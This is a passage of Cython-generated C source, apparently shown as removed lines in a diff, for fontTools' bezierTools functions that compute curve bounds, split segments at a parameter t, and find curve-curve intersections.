__Pyx_PyObject_Call(__pyx_t_5, __pyx_t_4, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1290, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1289 - * if len(c) == 3: - * return calcQuadraticBounds(*c) - * elif len(c) == 4: # <<<<<<<<<<<<<< - * return 
calcCubicBounds(*c) - * raise ValueError("Unknown curve degree") - */ - } - - /* "fontTools/misc/bezierTools.py":1291 - * elif len(c) == 4: - * return calcCubicBounds(*c) - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1291, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_Raise(__pyx_t_3, 0, 0, 0); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __PYX_ERR(0, 1291, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1286 - * - * - * def _curve_bounds(c): # <<<<<<<<<<<<<< - * if len(c) == 3: - * return calcQuadraticBounds(*c) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_bounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1294 - * - * - * def _split_segment_at_t(c, t): # <<<<<<<<<<<<<< - * if len(c) == 2: - * s, e = c - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_83_split_segment_at_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_82_split_segment_at_t, "_split_segment_at_t(c, t)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_83_split_segment_at_t = {"_split_segment_at_t", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_83_split_segment_at_t, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_82_split_segment_at_t}; -static PyObject 
*__pyx_pw_9fontTools_4misc_11bezierTools_83_split_segment_at_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_t = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_split_segment_at_t (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_c,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1294, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1294, __pyx_L3_error) - else { - 
__Pyx_RaiseArgtupleInvalid("_split_segment_at_t", 1, 2, 2, 1); __PYX_ERR(0, 1294, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_split_segment_at_t") < 0)) __PYX_ERR(0, 1294, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_c = values[0]; - __pyx_v_t = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_split_segment_at_t", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1294, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._split_segment_at_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_82_split_segment_at_t(__pyx_self, __pyx_v_c, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_82_split_segment_at_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_c, PyObject *__pyx_v_t) { - PyObject *__pyx_v_s = NULL; - PyObject *__pyx_v_e = NULL; - PyObject *__pyx_v_midpoint = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - Py_ssize_t __pyx_t_1; - int __pyx_t_2; - PyObject *__pyx_t_3 = 
NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *(*__pyx_t_6)(PyObject *); - int __pyx_t_7; - PyObject *__pyx_t_8 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_split_segment_at_t", 1); - - /* "fontTools/misc/bezierTools.py":1295 - * - * def _split_segment_at_t(c, t): - * if len(c) == 2: # <<<<<<<<<<<<<< - * s, e = c - * midpoint = linePointAtT(s, e, t) - */ - __pyx_t_1 = PyObject_Length(__pyx_v_c); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1295, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 2); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1296 - * def _split_segment_at_t(c, t): - * if len(c) == 2: - * s, e = c # <<<<<<<<<<<<<< - * midpoint = linePointAtT(s, e, t) - * return [(s, midpoint), (midpoint, e)] - */ - if ((likely(PyTuple_CheckExact(__pyx_v_c))) || (PyList_CheckExact(__pyx_v_c))) { - PyObject* sequence = __pyx_v_c; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1296, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_4 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_3 = PyList_GET_ITEM(sequence, 0); - __pyx_t_4 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_4); - #else - __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1296, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1296, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_5 = PyObject_GetIter(__pyx_v_c); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1296, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_5); - index = 0; __pyx_t_3 = __pyx_t_6(__pyx_t_5); if (unlikely(!__pyx_t_3)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 1; __pyx_t_4 = __pyx_t_6(__pyx_t_5); if (unlikely(!__pyx_t_4)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_4); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_6(__pyx_t_5), 2) < 0) __PYX_ERR(0, 1296, __pyx_L1_error) - __pyx_t_6 = NULL; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - goto __pyx_L5_unpacking_done; - __pyx_L4_unpacking_failed:; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_6 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1296, __pyx_L1_error) - __pyx_L5_unpacking_done:; - } - __pyx_v_s = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_e = __pyx_t_4; - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1297 - * if len(c) == 2: - * s, e = c - * midpoint = linePointAtT(s, e, t) # <<<<<<<<<<<<<< - * return [(s, midpoint), (midpoint, e)] - * if len(c) == 3: - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_linePointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1297, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_5)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_5, __pyx_v_s, __pyx_v_e, __pyx_v_t}; - __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_7, 3+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; - if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1297, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_v_midpoint = __pyx_t_4; - __pyx_t_4 = 0; - - /* 
"fontTools/misc/bezierTools.py":1298 - * s, e = c - * midpoint = linePointAtT(s, e, t) - * return [(s, midpoint), (midpoint, e)] # <<<<<<<<<<<<<< - * if len(c) == 3: - * return splitQuadraticAtT(*c, t) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_4 = PyTuple_New(2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1298, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_INCREF(__pyx_v_s); - __Pyx_GIVEREF(__pyx_v_s); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_s)) __PYX_ERR(0, 1298, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_midpoint); - __Pyx_GIVEREF(__pyx_v_midpoint); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_v_midpoint)) __PYX_ERR(0, 1298, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1298, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_midpoint); - __Pyx_GIVEREF(__pyx_v_midpoint); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_midpoint)) __PYX_ERR(0, 1298, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_e); - __Pyx_GIVEREF(__pyx_v_e); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_e)) __PYX_ERR(0, 1298, __pyx_L1_error); - __pyx_t_5 = PyList_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1298, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyList_SET_ITEM(__pyx_t_5, 0, __pyx_t_4)) __PYX_ERR(0, 1298, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyList_SET_ITEM(__pyx_t_5, 1, __pyx_t_3)) __PYX_ERR(0, 1298, __pyx_L1_error); - __pyx_t_4 = 0; - __pyx_t_3 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1295 - * - * def _split_segment_at_t(c, t): - * if len(c) == 2: # <<<<<<<<<<<<<< - * s, e = c - * midpoint = linePointAtT(s, e, t) - */ - } - - /* "fontTools/misc/bezierTools.py":1299 - * midpoint = linePointAtT(s, e, t) - * return [(s, midpoint), (midpoint, e)] - * if len(c) == 3: # <<<<<<<<<<<<<< - * return splitQuadraticAtT(*c, t) - * elif len(c) == 4: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_c); if 
(unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1299, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 3); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1300 - * return [(s, midpoint), (midpoint, e)] - * if len(c) == 3: - * return splitQuadraticAtT(*c, t) # <<<<<<<<<<<<<< - * elif len(c) == 4: - * return splitCubicAtT(*c, t) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_splitQuadraticAtT_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1300, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1300, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1300, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_t)) __PYX_ERR(0, 1300, __pyx_L1_error); - __pyx_t_8 = PyNumber_Add(__pyx_t_3, __pyx_t_4); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1300, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_8, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1300, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_r = __pyx_t_4; - __pyx_t_4 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1299 - * midpoint = linePointAtT(s, e, t) - * return [(s, midpoint), (midpoint, e)] - * if len(c) == 3: # <<<<<<<<<<<<<< - * return splitQuadraticAtT(*c, t) - * elif len(c) == 4: - */ - } - - /* "fontTools/misc/bezierTools.py":1301 - * if len(c) == 3: - * return splitQuadraticAtT(*c, t) - * elif len(c) == 4: # <<<<<<<<<<<<<< - * return splitCubicAtT(*c, t) - * raise ValueError("Unknown curve degree") - */ - __pyx_t_1 = PyObject_Length(__pyx_v_c); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1301, 
__pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 4); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1302 - * return splitQuadraticAtT(*c, t) - * elif len(c) == 4: - * return splitCubicAtT(*c, t) # <<<<<<<<<<<<<< - * raise ValueError("Unknown curve degree") - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_splitCubicAtT_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1302, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_8 = __Pyx_PySequence_Tuple(__pyx_v_c); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1302, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1302, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_t)) __PYX_ERR(0, 1302, __pyx_L1_error); - __pyx_t_3 = PyNumber_Add(__pyx_t_8, __pyx_t_5); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1302, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_4, __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1302, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1301 - * if len(c) == 3: - * return splitQuadraticAtT(*c, t) - * elif len(c) == 4: # <<<<<<<<<<<<<< - * return splitCubicAtT(*c, t) - * raise ValueError("Unknown curve degree") - */ - } - - /* "fontTools/misc/bezierTools.py":1303 - * elif len(c) == 4: - * return splitCubicAtT(*c, t) - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1303, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_Raise(__pyx_t_5, 0, 0, 0); - __Pyx_DECREF(__pyx_t_5); 
__pyx_t_5 = 0; - __PYX_ERR(0, 1303, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1294 - * - * - * def _split_segment_at_t(c, t): # <<<<<<<<<<<<<< - * if len(c) == 2: - * s, e = c - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_AddTraceback("fontTools.misc.bezierTools._split_segment_at_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_s); - __Pyx_XDECREF(__pyx_v_e); - __Pyx_XDECREF(__pyx_v_midpoint); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_85_curve_curve_intersections_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_84_curve_curve_intersections_t, "_curve_curve_intersections_t(curve1, curve2, precision=1e-3, range1=None, range2=None)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_85_curve_curve_intersections_t = {"_curve_curve_intersections_t", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_85_curve_curve_intersections_t, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_84_curve_curve_intersections_t}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_85_curve_curve_intersections_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject 
*__pyx_v_curve1 = 0; - PyObject *__pyx_v_curve2 = 0; - PyObject *__pyx_v_precision = 0; - PyObject *__pyx_v_range1 = 0; - PyObject *__pyx_v_range2 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_curve_curve_intersections_t (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_curve1,&__pyx_n_s_curve2,&__pyx_n_s_precision,&__pyx_n_s_range1,&__pyx_n_s_range2,0}; - values[2] = __Pyx_Arg_NewRef_FASTCALL(((PyObject *)((PyObject*)__pyx_float_1eneg_3))); - - /* "fontTools/misc/bezierTools.py":1307 - * - * def _curve_curve_intersections_t( - * curve1, curve2, precision=1e-3, range1=None, range2=None # <<<<<<<<<<<<<< - * ): - * bounds1 = _curve_bounds(curve1) - */ - values[3] = __Pyx_Arg_NewRef_FASTCALL(((PyObject *)Py_None)); - values[4] = __Pyx_Arg_NewRef_FASTCALL(((PyObject *)Py_None)); - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if 
(likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1306, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1306, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_curve_curve_intersections_t", 0, 2, 5, 1); __PYX_ERR(0, 1306, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_precision); - if (value) { values[2] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1306, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_range1); - if (value) { values[3] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1306, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_range2); - if (value) { values[4] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1306, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_curve_curve_intersections_t") < 0)) __PYX_ERR(0, 1306, __pyx_L3_error) - } - } else { - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = 
__Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - break; - default: goto __pyx_L5_argtuple_error; - } - } - __pyx_v_curve1 = values[0]; - __pyx_v_curve2 = values[1]; - __pyx_v_precision = values[2]; - __pyx_v_range1 = values[3]; - __pyx_v_range2 = values[4]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_curve_curve_intersections_t", 0, 2, 5, __pyx_nargs); __PYX_ERR(0, 1306, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_84_curve_curve_intersections_t(__pyx_self, __pyx_v_curve1, 